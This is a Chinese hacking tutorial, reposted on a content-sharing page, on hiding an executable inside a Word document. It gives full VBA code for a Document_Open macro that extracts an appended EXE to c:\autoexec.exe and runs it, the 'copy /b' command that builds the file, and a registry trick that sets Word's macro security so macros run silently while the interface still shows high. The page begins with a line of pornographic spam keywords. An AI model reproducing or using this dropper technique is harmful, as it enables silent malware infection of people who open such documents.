国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

打開APP
userphoto
未登錄

開通VIP,暢享免費電子書等14項超值服

開通VIP
EXE變成DOC
信息來源:www.hackblog.com

很多時候想做的東西不及時做出來,就會象這編文章一樣遲遲才能發(fā)表出來,原來寫好的稿子不知道已經(jīng)不知道放到什么地方去了,這編是重新整理過的.

其實這種轉(zhuǎn)換并不是文件格式上的變化,只不過是把一個EXE文件接在一個DOC文件的末尾而已,這個DOC文件當(dāng)然就不是不同WORD的文檔啦,該文檔中包含了宏語句,能在運行的時候把接在自己文件末尾的EXE文件數(shù)據(jù)讀取出來并運行,就造成一種假象,好象文檔打開時就運行了EXE文件似的.(和文件捆綁器的原理很象啊!)


熟悉VB的朋友都知道,WORD的宏是使用VBA來編寫的,具體語法和VB一樣,但有些方法VB中沒有,如宏病毒就是利用宏復(fù)制語句來達到感染的目的.和VB一樣,我們可以在編寫宏的時候調(diào)用WINDOWS API!!下面我們來介紹一下我們編寫這個宏需要用到的API函數(shù):

1)CreateFile 用于打開文件,該函數(shù)VB的聲明如下:
Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDistribution As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplate As Long) As Long


2)CloseHandle 用于關(guān)閉被打開文件的句柄,該函數(shù)VB的聲明如下:
Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long


3)ReadFile 用于從被打開文件中讀取數(shù)據(jù),該函數(shù)VB的聲明如下:

Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long


4)WriteFile 用于把讀取出的數(shù)據(jù)寫入文件,該函數(shù)VB的聲明如下:

Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long


5)SetFilePoniter移動文件指針,該函數(shù)VB的聲明如下:

Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, ByVal lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long


6)下面是以上函數(shù)的參數(shù)聲明

Public Const GENERIC_READ As Long = &H80000000

Public Const GENERIC_WRITE As Long = &H40000000

Public Const FILE_SHARE_READ As Long = 1

Public Const FILE_SHARE_WRITE As Long = 2

Public Const CREATE_NEW As Long = 1

Public Const CREATE_ALWAYS As Long = 2

Public Const OPEN_EXISTING As Long = 3

Public Const OPEN_ALWAYS As Long = 4

Public Const TRUNCATE_EXISTING As Long = 5

Public Const INVALID_HANDLE_VALUE As Long = -1

Public Const FILE_ATTRIBUTE_NORMAL As Long = &H80


好了,有了這些準(zhǔn)備工作就可以開始了,我們運行WORD2000,打開VISUAL BASIC編輯器,新建一個模塊,把上面的函數(shù)和參數(shù)聲明拷進去!再回到“ThisDocument”的代碼視圖,選擇Document Open的事件,輸入一下代碼:


Private Sub Document_Open()

Dim buffer(65536) As Byte

Dim h, h2, j, i, k As Long

h = CreateFile(ThisDocument.Path & "/" & ThisDocument.Name, GENERIC_READ, FILE_SHARE_READ + FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0)

‘以SHARE_READ的方式打開自身的DOC文件

h2 = CreateFile("c:\autoexec.exe", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0)

‘新建一個EXE文件準(zhǔn)備存放讀取出來的數(shù)據(jù).

If h = INVALID_HANDLE_VALUE Then

Exit Sub

End If

k = SetFilePointer(h, 32768, nil, 0)

‘把文件指針移動到DOC文件與EXE文件交界處.

Do

i = ReadFile(h, buffer(0), 65536, j, 0)

i = WriteFile(h2, buffer(0), j, j, 0)

Loop Until j < 65536

CloseHandle (h)

CloseHandle (h2)

Shell "c:\autoexec.exe"

‘運行EXE文件

End Sub

這樣宏就編寫好了,注意的地方就是上面SetFilePointer函數(shù)的使用部分:32768是你編寫完宏保存好的DOC文件的文件大小,不一頂就是32768哦,大家注意!


大家可能有疑問,如何把EXE文件接到DOC文件后面呢?很簡單,把你要接的EXE放到和這個DOC文件同一個目錄下.運行DOC命令:


copy /b xxxx.doc + xxxxx.exe newdoc.doc


這樣就可以了~~~.當(dāng)你打開這個NEWDOC.DOC的時候,宏就會把后面的EXE文件讀出來并保存在C:\AUTOEXEC.EXE中,然后運行,是不是很恐怖啊!不過這需要你的WORD2000安全度為最低的時候才能實現(xiàn),關(guān)于這個安全度的問題,我們又發(fā)現(xiàn)了微軟的小BUG,大家看看注冊表中這個鍵:


HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security 中的

Level值.當(dāng)安全度是3(高)的時候,WORD不會運行任何的宏,2(中)的時候WORD會詢問你是否運行宏,1(低)的時候WORD就會自動運行所有的宏!但很容易就被發(fā)現(xiàn)安全度被設(shè)為低了,聰明的你一定想到如果這個值變?yōu)?的時候會怎么樣!!??對了!如果設(shè)為0的話,WORD里面就會顯示安全度為高,但卻能自動運行任何的宏!!是不是很夸張??和注冊表編輯器的后門一樣這都是MS的后門吧?


如果要受害人的機器接受你的DOC文件又能順利運行,最重要就是把WORD的安全度在注冊表中的值改為0,怎么改??方法太多了吧,單是IE的惡意代碼能實現(xiàn)的都太多了,另外,如果網(wǎng)頁上連接上是DOC的話,IE也會自動下載該DOC文件!危險的MS啊!!


這個算不算漏洞我不敢說,但防范真的很難,除非一天到晚監(jiān)視著注冊表,或者不用WORD?太消極了吧,最重要的是小心防范,陌生人的東西千萬不要收!包括非EXE文件,我們現(xiàn)在發(fā)現(xiàn)了DOC文件能隱藏EXE文件,也會有人發(fā)現(xiàn)其他文件能隱藏EXE,所以大家千萬要小心
本站僅提供存儲服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點擊舉報。
打開APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
(引用)VB中使用API函數(shù)sndPlaySound
使用WININET的函數(shù)寫下載功能 -- VB
VB - 播放WAV文件
VB代碼VB小程序:實現(xiàn)USB攝像頭視頻圖像的監(jiān)控、截圖、錄像
功能強大的SendMessage函數(shù) vb編程
VB 查找游戲窗口句柄的方法
更多類似文章 >>
生活服務(wù)
分享 收藏 導(dǎo)長圖 關(guān)注 下載文章
綁定賬號成功
后續(xù)可登錄賬號暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點擊這里聯(lián)系客服!

聯(lián)系客服